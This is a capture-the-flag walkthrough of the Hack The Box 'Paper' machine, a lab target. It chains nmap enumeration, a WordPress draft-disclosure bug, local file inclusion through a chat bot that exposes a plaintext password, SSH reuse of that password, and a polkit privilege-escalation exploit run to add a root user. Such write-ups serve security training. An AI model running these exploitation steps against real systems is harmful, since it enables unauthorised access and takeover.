HTB Writeup: Paper
You miss 100% of the shots you don’t take ~ Wayne Gretzky ~~ Michael Scott
Enumeration
nmap Scan
# Nmap 7.92 scan initiated Mon Apr 11 15:07:52 2022 as: nmap -sC -sV -T3 -oN nmap.all-port.txt -vv -p- 10.10.11.143
Nmap scan report for 10.10.11.143 (10.10.11.143)
Host is up, received echo-reply ttl 63 (0.084s latency).
Scanned at 2022-04-11 15:07:58 IST for 54s
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.0 (protocol 2.0)
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-title: HTTP Server Test Page powered by CentOS
| http-methods:
| Supported Methods: GET POST OPTIONS HEAD TRACE
|_ Potentially risky methods: TRACE
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
443/tcp open ssl/http syn-ack ttl 63 Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
| http-methods:
| Supported Methods: GET POST OPTIONS HEAD TRACE
|_ Potentially risky methods: TRACE
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
|_http-title: HTTP Server Test Page powered by CentOS
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US/[email protected]
| Subject Alternative Name: DNS:localhost.localdomain
| Issuer: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US/[email protected]/organizationalUnitName=ca-3899279223185377061
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-07-03T08:52:34
| Not valid after: 2022-07-08T10:32:34
| MD5: 579a 92bd 803c ac47 d49c 5add e44e 4f84
| SHA-1: 61a2 301f 9e5c 2603 a643 00b5 e5da 5fd5 c175 f3a9
| -----BEGIN CERTIFICATE-----
| MIIE4DCCAsigAwIBAgIIdryw6eirdUUwDQYJKoZIhvcNAQELBQAwgY8xCzAJBgNV
| BAYTAlVTMRQwEgYDVQQKDAtVbnNwZWNpZmllZDEfMB0GA1UECwwWY2EtMzg5OTI3
| OTIyMzE4NTM3NzA2MTEeMBwGA1UEAwwVbG9jYWxob3N0LmxvY2FsZG9tYWluMSkw
| JwYJKoZIhvcNAQkBFhpyb290QGxvY2FsaG9zdC5sb2NhbGRvbWFpbjAeFw0yMTA3
| MDMwODUyMzRaFw0yMjA3MDgxMDMyMzRaMG4xCzAJBgNVBAYTAlVTMRQwEgYDVQQK
| DAtVbnNwZWNpZmllZDEeMBwGA1UEAwwVbG9jYWxob3N0LmxvY2FsZG9tYWluMSkw
| JwYJKoZIhvcNAQkBFhpyb290QGxvY2FsaG9zdC5sb2NhbGRvbWFpbjCCASIwDQYJ
| KoZIhvcNAQEBBQADggEPADCCAQoCggEBAL1/3n1pZvFgeX1ja/w84jNxT2NcBkux
| s5DYnYKeClqncxe7m4mz+my4uP6J1kBP5MudLe6UE62KFX3pGc6HCp2G0CdA1gQm
| 4WYgF2E7aLNHZPrKQ+r1fqBBw6o3NkNxS4maXD7AvrCqkgpID/qSziMJdUzs9mS+
| NTzWq0IuSsTztLpxUEFv7T6XPGkS5/pE2hPWO0vz/Bd5BYL+3P08fPsC0/5YvgkV
| uvFbFrxmuOFOTEkrTy88b2fLkbt8/Zeh4LSdmQqriSpxDnag1i3N++1aDkIhAhbA
| LPK+rZq9PmUUFVY9MqizBEixxRvWhaU9gXMIy9ZnPJPpjDqyvju5e+kCAwEAAaNg
| MF4wDgYDVR0PAQH/BAQDAgWgMAkGA1UdEwQCMAAwIAYDVR0RBBkwF4IVbG9jYWxo
| b3N0LmxvY2FsZG9tYWluMB8GA1UdIwQYMBaAFBB8mEcpW4ZNBIaoM7mCF/Z+7ffA
| MA0GCSqGSIb3DQEBCwUAA4ICAQCw4uQfUe+FtsPdT0eXiLHg/5kXBGn8kfJZ45hP
| gcuwa5JfAQeA3JXx7piTSiMMk0GrWbqbrpX9ZIkwPnZrN+9PV9/SNCEJVTMy+LDQ
| QGsyqwkZpMK8QThzxRvXvnyf3XeEFDL6N4YeEzWz47VNlddeqOBHmrDI5SL+Eibh
| wxNj9UXwhEySUpgMAhU+QtXk40sjgv4Cs3kHvERvpwAfgRA7N38WY+njo/2VlGaT
| qP+UekP42JveOIWhf9p88MUmx2QqtOq/WF7vkBVbAsVs+GGp2SNhCubCCWZeP6qc
| HCX0/ipKZqY6zIvCcfr0wHBQDY9QwlbJcthg9Qox4EH1Sgj/qKPva6cehp/NzsbS
| JL9Ygb1h65Xpy/ZwhQTl+y2s+JxAoMy3k50n+9lzCFBiNzPLsV6vrTXCh7t9Cx07
| 9jYqMiQ35cEbQGIaKQqzguPXF5nMvWDBow3Oj7fYFlCdLTpaTjh8FJ37/PrhUWIl
| Li+WW8txrQKqm0/u1A41TI7fBxlUDhk6YFA+gIxX27ntQ0g+lLs8rwGlt/o+e3Xa
| OfcJ7Tl0ovWa+c9lWNju5mgdU+0v4P9bqv4XcIuyE0exv5MleA99uOYE1jlWuKf1
| m9v4myEY3dzgw3IBDmlYpGuDWQmMYx8RVytYN3Z3Z64WglMRjwEWNGy7NfKm7oJ4
| mh/ptg==
|_-----END CERTIFICATE-----
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
| tls-alpn:
|_ http/1.1
|_ssl-date: TLS randomness does not represent time
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Apr 11 15:08:52 2022 -- 1 IP address (1 host up) scanned in 59.75 seconds
-
Two web servers, listening on
TCP/80
andTCP/443
-
An abnormal response header is found while making curl requests:
curl -I http://`cat ip.txt`/ # HTTP/1.1 403 Forbidden # Date: Tue, 26 Jul 2022 08:51:43 GMT # Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9 # X-Backend-Server: office.paper # Last-Modified: Sun, 27 Jun 2021 23:47:13 GMT # ETag: "30c0b-5c5c7fdeec240" # Accept-Ranges: bytes # Content-Length: 199691 # Content-Type: text/html; charset=UTF-8
-
The header
X-Backend-Server
points to a VHOSToffice.paper
-
Another curl request with the header
Host: office.paper
returns a HTTP 200 with hinting a wordpress installation. -
One of the post says that there might be some secret contents posted in drafts of the user
prisonmike
wp-scan
-
The wp-scan shows that the website is vulnerable to a number of vulnerabilities.
| [!] Title: WordPress <= 5.2.3 - Unauthenticated View Private/Draft Posts | Fixed in: 5.2.4 | References: | - https://wpscan.com/vulnerability/3413b879-785f-4c9f-aa8a-5a4a1d5e0ba2 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17671 | - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/ | - https://blog.wpscan.com/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html | - https://github.com/WordPress/WordPress/commit/f82ed753cf00329a5e41f2cb6dc521085136f308 | - https://0day.work/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts/ |
-
Unauthenticated users can view Private and or Draft posts by visiting
http://office.paper/?static=1
( PoC)[CVE-2019-17671] -
A secret registration URL is obtained, which points to another VHOST.
chat.office.paper
. -
The URL is a link to rocket chat registration page.
Initial Foothold
-
On registering, messages history in the channel
#general
is visible. -
A bot application is added to the workspace with
recyclops
-
The
recyclops file
andrecyclops list
functions are found to vulnerable to LFI on some basic testing.
User Access
-
A user
dwight
is available on the remote target as seen by contents of/etc/passwd
. -
A bash sdript
bot_restart.sh
is available to read in dwight’s home folder.#!/bin/bash # Cleaning hubot's log so that it won't grow too large. echo "" > /home/dwight/hubot/.hubot.log # For starting the bot 20-ish (10+20) seconds late, when the server is restarted. # This is because MongoDB and Rocket-Chat server needs some time to startup properly sleep 10s # Checks if Hubot is running every 10s while [ 1 ]; do sleep 20s alive=$(/usr/sbin/ss -tulnp|grep 8000); if [[ -n $alive ]]; then err=$(grep -i 'unhandled-rejections=strict' /home/dwight/hubot/.hubot.log) if [[ -n $err ]]; then # Restarts bot echo "[-] Bot not running! date"; #Killing the old process pid=$(ps aux|grep -i 'hubot -a rocketchat'|grep -v grep|cut -d " " -f6); kill -9 $pid; cd /home/dwight/hubot; # Cleaning hubot's log so that it won't grow too large. echo "" > /home/dwight/hubot/.hubot.log bash /home/dwight/hubot/start_bot.sh& else echo "[+] Bot running succesfully! date"; fi else # Restarts bot echo "[-] Bot not running! date"; #Killing the old process pid=$(ps aux|grep -i 'hubot -a rocketchat'|grep -v grep|cut -d " " -f6); kill -9 $pid; cd /home/dwight/hubot; bash /home/dwight/hubot/start_bot.sh& fi done
-
The contents of the folder
/home/dwight/hubot
:drwx------ 8 dwight dwight 4096 Sep 16 2021 . drwx------ 11 dwight dwight 281 Feb 6 07:55 .. -rw-r--r-- 1 dwight dwight 0 Jul 3 2021 \ srwxr-xr-x 1 dwight dwight 0 Jul 3 2021 127.0.0.1:8000 srwxrwxr-x 1 dwight dwight 0 Jul 3 2021 127.0.0.1:8080 drwx--x--x 2 dwight dwight 36 Sep 16 2021 bin -rw-r--r-- 1 dwight dwight 258 Sep 16 2021 .env -rwxr-xr-x 1 dwight dwight 2 Jul 3 2021 external-scripts.json drwx------ 8 dwight dwight 163 Jul 3 2021 .git -rw-r--r-- 1 dwight dwight 917 Jul 3 2021 .gitignore -rw-r--r-- 1 dwight dwight 17911 Jul 26 05:29 .hubot.log -rwxr-xr-x 1 dwight dwight 1068 Jul 3 2021 LICENSE drwxr-xr-x 89 dwight dwight 4096 Jul 3 2021 node_modules drwx--x--x 115 dwight dwight 4096 Jul 3 2021 node_modules_bak -rwxr-xr-x 1 dwight dwight 1062 Sep 16 2021 package.json -rwxr-xr-x 1 dwight dwight 972 Sep 16 2021 package.json.bak -rwxr-xr-x 1 dwight dwight 30382 Jul 3 2021 package-lock.json -rwxr-xr-x 1 dwight dwight 14 Jul 3 2021 Procfile -rwxr-xr-x 1 dwight dwight 5044 Jul 3 2021 README.md drwx--x--x 2 dwight dwight 193 Jan 13 2022 scripts -rwxr-xr-x 1 dwight dwight 100 Jul 3 2021 start_bot.sh drwx------ 2 dwight dwight 25 Jul 3 2021 .vscode -rwxr-xr-x 1 dwight dwight 29951 Jul 3 2021 yarn.lock
-
Contents of the file
/home/dwight/hubot/.env
:export ROCKETCHAT_URL='http://127.0.0.1:48320' export ROCKETCHAT_USER=recyclops export ROCKETCHAT_PASSWORD=Queenofblad3s!23 export ROCKETCHAT_USESSL=false export RESPOND_TO_DM=true export RESPOND_TO_EDITED=true export PORT=8000 export BIND_ADDRESS=127.0.0.1
-
A password is available
Queenofblad3s!23
-
Using the credentials
dwight:Queenofblad3s!23
, a valid SSH session is obtained.
Privilege Escalation
Enumeration
- A basic enumeration using
linpeas
, shows that the target machine is vulnerable to[CVE-2021-3560](https://access.redhat.com/security/cve/CVE-2021-3560)
- Using the PoC available here, a privilege escalation can be achieved.
Exploitation
-
The
[poc.sh](http://poc.sh)
is downloaded and sent to the taget machine. -
The following command will add a superuser with credentials:
mostwanted002:mostwanted002
./poc.sh -u=mostwanted002 -p=mostwanted002
-
The new user can be accessed by logging in via
su
.su - mostwanted002
The remote target is now completely compromised.